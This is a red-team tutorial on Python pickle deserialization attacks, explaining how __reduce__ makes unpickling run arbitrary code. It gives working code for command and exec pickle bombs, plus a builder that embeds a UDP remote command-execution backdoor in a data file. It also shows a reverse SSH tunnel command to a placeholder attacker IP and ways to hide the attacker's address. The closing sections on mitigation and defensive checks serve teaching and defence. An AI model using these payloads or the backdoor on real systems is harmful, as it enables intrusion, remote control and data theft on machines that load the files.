Python Deserialization Attack Introduction: How to Build a Python Pickle Bomb

This article introduces a long-standing, insecure feature of Python data serialization (the pickle library) and demonstrates how a red team attacker can exploit it to create a malicious binary or text data file that executes remote code or commands upon deserialization. The following attack flow diagram illustrates this process:

We will follow three steps, with program code, to show how deserialization attacks work:

[ Step1 ] Crafting Malicious Data: An attacker crafts a malicious payload that, when deserialized, will execute code on the target system. This payload often takes advantage of the inherent trust the deserialization process has in the incoming data.
[ Step2 ] Injection: The attacker injects the malicious payload into the application, typically through input fields, network requests, or other data sources.
[ Step3 ] Execution: The application deserializes the malicious data, triggering the execution of the embedded code. This can lead to arbitrary code execution, compromising the system's security.

Important: All the scripts provided are intended for cybersecurity research and training purposes only. Do not use them to attack real-world systems.

# Created:     2024/07/06
# Version:     v0.1.1
# Copyright:   Copyright (c) 2024 LiuYuancheng
# License:     MIT License

Introduction

Deserialization is the process of converting data from a serialized format back into its original data structure. A deserialization attack occurs when an application deserializes untrusted or maliciously crafted data, leading to potential security vulnerabilities. These attacks can result in various forms of exploitation, including arbitrary code execution, data corruption, and denial of service. The vulnerability arises because the deserialization process often assumes that the incoming data is well-formed and trustworthy. Several Common Vulnerabilities and Exposures (CVE) entries cover unsafe pickle deserialization in Python libraries, for example:

CVE-2019-6446: NumPy 1.16.0 and earlier use the pickle module unsafely, so a crafted serialized object passed to numpy.load() can execute arbitrary code.
CVE-2024-34997: A deserialization vulnerability identified in joblib version 1.4.2, specifically in the NumpyArrayWrapper().read_array() component within the joblib.numpy_pickle module.

Introduction of Python Data Serialization

In Python, data serialization often involves converting data into formats like JSON, YAML, or XML for storage and retrieval. These formats are widely used due to their readability and interoperability. However, they can be limited when handling complex data structures, such as nested dictionaries with bytes data or built-in objects. Consider the following example:

# An example data structure that cannot be converted to JSON, YAML, or XML format.
from collections import OrderedDict
data = OrderedDict({
    'Timestamp': '2023-04-05 16:00:00',
    'IoTData': {
        'IP': '172.23.155.209',
        'Port': 3001,
        'value': [1.2, 1.3, 1.4],
        'RptPeer': {
            'Hub1': 1.2,
            'Hub2': 1.3
        },
        'CfgSet': set(['CT100', 'COM3', 3])  # set data is not supported by JSON
    }
})

For such complex data objects, formats like JSON, YAML, or XML are not suitable. In these cases, the pickle library provides a convenient way to serialize and deserialize data. The pickle module can convert complex Python objects into a byte stream (serialization) and then convert the byte stream back into the original objects (deserialization).

import pickle
# Serialize the data to bytes
serialized_data = pickle.dumps(data)
# Deserialize the bytes back to the original data
deserialized_data = pickle.loads(serialized_data)

Using pickle.dumps() allows you to serialize the data into bytes, making it easy to save to a file or transfer over a network. The pickle.loads() function can then be used to deserialize the bytes back into the original data structure. The results of dumping and loading the object are shown below:

This capability is particularly useful for storing or transmitting complex Python objects that are not compatible with simpler serialization formats.
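The difference between the two approaches can be checked with a small sketch. The `record` structure and the `json_error` helper are hypothetical names used only for illustration; the record is a reduced version of the example data above.

```python
import json
import pickle
from collections import OrderedDict

# Hypothetical sample record, reduced from the example data above.
record = OrderedDict({
    'Port': 3001,
    'CfgSet': {'CT100', 'COM3', 3},  # a set has no JSON equivalent
})

def json_error(obj):
    """Return the message json.dumps() raises for obj, or None on success."""
    try:
        json.dumps(obj)
    except TypeError as err:
        return str(err)
    return None

json_failure = json_error(record)
restored = pickle.loads(pickle.dumps(record))

print('json.dumps failed:', json_failure is not None)
print('pickle round trip equal:', restored == record)
print('restored type:', type(restored).__name__)
```

The round trip keeps both the OrderedDict type and the set value, which is the convenience that makes pickle attractive and also the reason its byte stream has to be able to name arbitrary Python callables.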

Introduction of Python Deserialization Vulnerabilities

Using the Python pickle module to serialize and deserialize data is convenient, but it is insecure when handling untrusted data. The official Python documentation highlights this risk, warning that the module is not secure and that only trusted data should be unpickled.

The pickle module can serialize and deserialize Python objects, but it has the capability to execute arbitrary code during deserialization. This feature can be exploited by attackers to run malicious code on the target system. A simple way to create a pickle bomb involves using an object with a custom __reduce__() method as shown in the pickle doc:

The __reduce__() method can return a callable along with a tuple of arguments for it. When the data is deserialized, that callable is invoked with those arguments. Here is an example of a simple serialized data loader that can load both binary and text format data:

# A normal pickle serialized data file load program (version v0.0.2)
import base64
import pickle

while True:
    choice = input("Input load serialized data file format([1] byte file, [2] txt file):")
    if choice == '1':
        # Binary format: unpickle directly from the file handle.
        with open('data.pkl', 'rb') as fh:
            originalData = pickle.load(fh)
        print(originalData)
    elif choice == '2':
        # Text format: the pickle bytes are stored base64-encoded.
        with open('data.txt', 'r') as fh:
            dataStr = fh.read()
        originalData = pickle.loads(base64.b64decode(dataStr))
        print(originalData)
    else:
        print("Exit....")
        break

Link to download Full Pickled data load program(pickleBombLoader.py)

To build a simple Python pickle bomb, we can override the __reduce__() method to return the os.system function with a command string. This way, when the data loader reads the data file, it will execute the command:

import os
import pickle
import base64

# a simple pickle bomb to run a command
class PickleCmd:
    def __reduce__(self):
        cmd = 'uname -a'
        return os.system, (cmd,)
obj = PickleCmd()
pickledata = pickle.dumps(obj, protocol=pickle.HIGHEST_PROTOCOL)

with open('data.pkl', 'wb') as handle:
    pickle.dump(obj, handle, protocol=pickle.HIGHEST_PROTOCOL)

dataStr = base64.b64encode(pickledata).decode('ascii')
with open('data.txt', 'w') as fh:
    fh.write(dataStr)

When we run this script, it will create two data files: a binary data file (data.pkl) and a text data file (data.txt). Using the loader to read these files will execute the command, demonstrating how the system information can be retrieved:

With the ability to execute commands, an attacker can integrate harmful actions, such as deleting files or retrieving credential information. This highlights the severe risk of deserializing untrusted data with the pickle module. Always ensure that serialized data is from a trusted source to avoid such vulnerabilities.
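One way to check that a pickle file comes from a trusted source is to sign it and verify the signature before unpickling. The following is a minimal sketch, not a complete solution: `SECRET_KEY`, `sign_pickle`, and `load_signed_pickle` are hypothetical names, and the approach assumes the key is known only to the trusted writer and reader.

```python
import hashlib
import hmac
import pickle

# Assumption: this key is shared only between the trusted writer and reader.
SECRET_KEY = b'replace-with-a-real-secret'
DIGEST_SIZE = hashlib.sha256().digest_size

def sign_pickle(obj, key=SECRET_KEY):
    """Pickle obj and prepend an HMAC-SHA256 tag over the pickle bytes."""
    payload = pickle.dumps(obj)
    tag = hmac.new(key, payload, hashlib.sha256).digest()
    return tag + payload

def load_signed_pickle(blob, key=SECRET_KEY):
    """Verify the tag first; unpickle only when it matches."""
    tag, payload = blob[:DIGEST_SIZE], blob[DIGEST_SIZE:]
    expected = hmac.new(key, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError('signature mismatch: refusing to unpickle')
    return pickle.loads(payload)

blob = sign_pickle({'Port': 3001})
print(load_signed_pickle(blob))

# Flip one bit of the payload to simulate tampering.
tampered = blob[:-1] + bytes([blob[-1] ^ 0x01])
try:
    load_signed_pickle(tampered)
except ValueError as err:
    print(err)
```

The signature only proves who produced the bytes. If the key leaks, or if the trusted writer itself pickles attacker-controlled objects, the loader is exposed again.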

Build Python Pickle Bomb

In this section, we will build a more complex Python pickle bomb program that allows us to bypass system authorization mechanisms, remotely execute commands on the victim machine, and retrieve the results.

Clarification on Command Execution

Before we proceed, it's important to clarify how commands can be executed within the __reduce__() function. Consider the following modification:

class PickleCmd:
    def __reduce__(self):
        os.system('date')
        os.system('ifconfig')
        with open('testfile.txt', 'w') as fh:
            fh.write("Test file contents")
        cmd = ('uname -a')
        return os.system, (cmd,)

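If we rebuild the pickle bomb and load it, the additional statements are not executed on the loading side. They run inside __reduce__() when the object is pickled, that is, on the machine that builds the data file, and only the callable and arguments returned by __reduce__() are written to the pickle stream.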
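The timing can be observed with a harmless stand-in. In this sketch the `TimingDemo` class and the `events` list are hypothetical, and the built-in sorted() takes the place of a command so that nothing is run on the system.

```python
import pickle

events = []  # filled in only when the body of __reduce__() runs

class TimingDemo:
    def __reduce__(self):
        # This statement runs while the object is being pickled.
        events.append('__reduce__ body ran')
        # Only this (callable, args) pair is stored in the byte stream.
        return sorted, ([3, 1, 2],)

blob = pickle.dumps(TimingDemo())
events_after_dump = list(events)

result = pickle.loads(blob)
events_after_load = list(events)

print(events_after_dump)   # the body ran during dumps()
print(events_after_load)   # unchanged: loads() did not run the body
print(result)              # [1, 2, 3], the return value of sorted()
```

Note that loads() does not return a TimingDemo instance at all: the result is whatever the stored callable returns.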

Only the callable returned by __reduce__() is executed during deserialization. To perform more complex tasks, such as running commands on the victim's machine, we can use a reverse SSH tunnel command. For example:

cmd = ('ssh -R 0.0.0.0:7070:localhost:22 <redTeam hacker\'s IP address>')

However, this method exposes the red team attacker's IP address in the command logs. If we want to run more complex Python programs without exposing this information, we can use the exec() function. The exec() function allows you to execute arbitrary Python code from a string or compiled code input. It is useful for running dynamically generated Python code, though it should be used cautiously due to its potential risks.

Improving the Pickle Bomb Program

Let's improve our pickle bomb program to return the exec function and a piece of Python code in the __reduce__() function:

import pickle
import base64

codeContent="""
with open('testfile.txt', 'w') as fh:
    fh.write("Test file contents")
"""
# a simple pickle bomb to run Python code
class PickleCode:
    def __reduce__(self):
        return exec, (codeContent,)
    
obj = PickleCode()
pickledata = pickle.dumps(obj, protocol=pickle.HIGHEST_PROTOCOL)

with open('data.pkl', 'wb') as handle:
    pickle.dump(obj, handle, protocol=pickle.HIGHEST_PROTOCOL)

dataStr = base64.b64encode(pickledata).decode('ascii')
with open('data.txt', 'w') as fh:
    fh.write(dataStr)

After loading the data file, you will see that the Python code to create a file is executed:

By leveraging the exec() function, we can execute more complex and dynamic Python code, making the pickle bomb more powerful and versatile for demonstrating security vulnerabilities in the deserialization process. Remember, this information is for educational purposes only and should not be used for malicious activities.
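From the defender's side, a pickle file can be examined without loading it. The sketch below uses pickletools.genops() from the standard library to list opcodes that import a global or call something during unpickling. The `SUSPICIOUS` set, the `scan_pickle` helper, and the `Harmless` class are assumptions made for illustration, and sorted() again stands in for a dangerous callable.

```python
import pickle
import pickletools

# Opcodes that import a global or invoke a callable while unpickling.
SUSPICIOUS = {'GLOBAL', 'STACK_GLOBAL', 'REDUCE', 'INST', 'OBJ',
              'NEWOBJ', 'NEWOBJ_EX', 'BUILD'}

def scan_pickle(blob):
    """Return the suspicious opcode names found in blob, without unpickling it."""
    found = []
    for opcode, arg, pos in pickletools.genops(blob):
        if opcode.name in SUSPICIOUS:
            found.append(opcode.name)
    return found

class Harmless:
    def __reduce__(self):
        return sorted, ([3, 1, 2],)

plain = pickle.dumps({'Port': 3001, 'value': [1.2, 1.3]})
with_call = pickle.dumps(Harmless())

print(scan_pickle(plain))      # plain containers need none of these opcodes
print(scan_pickle(with_call))  # includes REDUCE and a global lookup opcode
```

This is a triage aid rather than a guarantee: legitimate pickles of class instances also use these opcodes, so a hit means the file deserves a closer look with pickletools.dis(), not that it is necessarily malicious.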

Building a More Complex Python Pickle Bomb

In this section, we will build a more complex Python pickle bomb program. This program will include a UDP server that receives command execution requests from the red team attacker, executes the code, and returns the results to the sender. This method ensures that the red team's IP address is not exposed, even if the bomb is discovered.

Here is the UDP server program:

# A normal UDP server hosted on port 3000 that accepts different UDP client connections,
# executes commands, and sends the results back to the corresponding client (version v0.0.
import socket
import subprocess
BUFFER_SZ = 4096 
port = 3000
udpServer = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udpServer.bind(('0.0.0.0', port))
while True:
    data, address = udpServer.recvfrom(BUFFER_SZ)
    cmdMsg = data.decode('utf-8')
    if cmdMsg == '': continue
    if cmdMsg == 'exit': exit()
    result = 'Command not found!'
    try:
        result = subprocess.check_output(cmdMsg, shell=True).decode()
    except Exception as err:
        result = str(err)
    udpServer.sendto(result.encode('utf-8'), address)

Link to download UDP command execution server program(udpCmdServer.py)

Next, we will read this Python program as a string, pass it as a parameter in the pickle bomb object, and create the pickle bomb data file with a simple bomb builder:

# A normal pickle serialized data file create program (version v0.0.2)
import pickle
import base64

# Serialized file:
#fileName = 'flaskWebShellApp.py'
fileName = 'udpCmdServer.py'
dataStr = None 
with open(fileName, 'r') as fh:
    dataStr = fh.read()

class PickleBomb:
    def __reduce__(self):
        pass
        return exec, (dataStr,)

obj = PickleBomb()
pickledata = pickle.dumps(obj, protocol=pickle.HIGHEST_PROTOCOL)

with open('data.pkl', 'wb') as handle:
    pickle.dump(obj, handle, protocol=pickle.HIGHEST_PROTOCOL)

dataStr = base64.b64encode(pickledata).decode('ascii')
with open('data.txt', 'w') as fh:
    fh.write(dataStr)

Link to download Full Pickle Bomb Builder Program (pickleBombBuilder.py)

Now, if anyone runs the pickle loader or any program that attempts to load the pickle file, the bomb will be activated:

We can then use a simple UDP client program to connect to the victim's IP address and run commands:

Link to download Full UDP client program (udpCom.py)

As shown, we can check the folder structure and network information of the victim.

Remark: Since the Python file is passed in as a string, if the script calls a library that is not installed on the victim's machine, it will fail to execute.

Demo Setup and Execution

To download the programs and try the demo, follow the Program Setup and Program Execution sections at this link:

https://github.com/LiuYuancheng/Python_Malwares_Repo/tree/main/src/pickleBomb

Development/Execution Environment

python 3.7.4+

Additional Lib/Software Need : N.A

Program Files List

Program File	Execution Env	Description
pickleBombBuilder.py	python 3	Program to convert an executable Python program into a byte/text format serialized data file (pickle bomb file).
pickleBombLoader.py	python 3	Program to demo loading the byte or text format serialized data and triggering the pickle bomb.
simplepickleCmdRun.py	python 3	A simple script that creates a command-execution pickle bomb.
simplepickleCodeRun.py	python 3	A simple script that creates a Python-code pickle bomb.
udpCmdServer.py	python 3	A normal UDP server hosted on port 3000 that accepts different UDP client connections.
udpCom.py	python 3	A UDP communication library that provides the UDP client program.
data.txt		Text format pickle bomb file
data.pkl		Bytes format pickle bomb file

Follow the sections below to create and demo the Python deserialization attack.

Run the pickle bomb builder

Copy the Python program file (for example udpCmdServer.py) into the same folder as pickleBombBuilder.py, then run the builder with this command:

python pickleBombBuilder.py -f udpCmdServer.py
    -c : build cmd bomb: python pickleBombBuilder.py -c <Command string>
    -f : build code bomb: python pickleBombBuilder.py -f <Python program file name>
    -h : help

Then the bytes format pickle bomb data.pkl and text format pickle bomb file data.txt will be created.

Run the pickle bomb loader

Copy the pickle file you want to deserialize into the same folder, then run the loader:

python pickleBombLoader.py

Connect to the UDP command execution server

When the UDP command execution server pickle bomb is activated, run the UDP communication module and select the UDP client function, then input the victim's IP address and port 3000. After connecting, type in a command; it will be sent to the pickle bomb, and the execution result will be retrieved and shown on the client.

python udpCom.py

Mitigations of Python Deserialization Attack

To prevent Python deserialization attacks, there are several points we can follow:

Avoid Deserialization of Untrusted Data: Do not deserialize data from untrusted sources. Use safer serialization formats such as JSON or XML where possible, as they do not support code execution during deserialization.
Validate Input: Implement strict input validation to ensure that only well-formed and expected data is processed.
Use Safe Libraries: Prefer libraries and frameworks that are designed with security in mind and that do not support unsafe deserialization.
Sandboxing: If deserialization of untrusted data is unavoidable, run the deserialization process in a restricted environment (sandbox) to limit the potential impact.
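When pickle cannot be avoided, the set of globals it is allowed to resolve can be restricted by overriding Unpickler.find_class(), an approach described in the pickle documentation. The sketch below is a minimal illustration under the assumption that the expected data needs only a few built-in types; `SAFE_BUILTINS`, `RestrictedUnpickler`, `restricted_loads`, and `Harmless` are hypothetical names, and sorted() stands in for a dangerous callable.

```python
import builtins
import io
import pickle

# Assumption: only these built-in types are ever expected in the data.
SAFE_BUILTINS = {'set', 'frozenset', 'range', 'complex'}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Resolve a global only if it is on the allow-list.
        if module == 'builtins' and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(
            "global '%s.%s' is forbidden" % (module, name))

def restricted_loads(blob):
    """Counterpart of pickle.loads() that enforces the allow-list."""
    return RestrictedUnpickler(io.BytesIO(blob)).load()

class Harmless:
    def __reduce__(self):
        return sorted, ([3, 1, 2],)

# Plain containers load normally.
print(restricted_loads(pickle.dumps({'CfgSet': {1, 2}})))

# Anything that needs a global outside the allow-list is rejected.
try:
    restricted_loads(pickle.dumps(Harmless()))
except pickle.UnpicklingError as err:
    print('blocked:', err)
```

An allow-list is preferable to a block-list here, because many callables besides os.system and exec can be abused. This reduces the attack surface but does not make unpickling untrusted data safe in general.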

Conclusion and Reference

Deserialization attacks pose a significant risk, particularly when using insecure libraries like Python's pickle. Understanding the nature of these vulnerabilities and implementing best practices to avoid or mitigate them is crucial for maintaining secure applications.

Reference: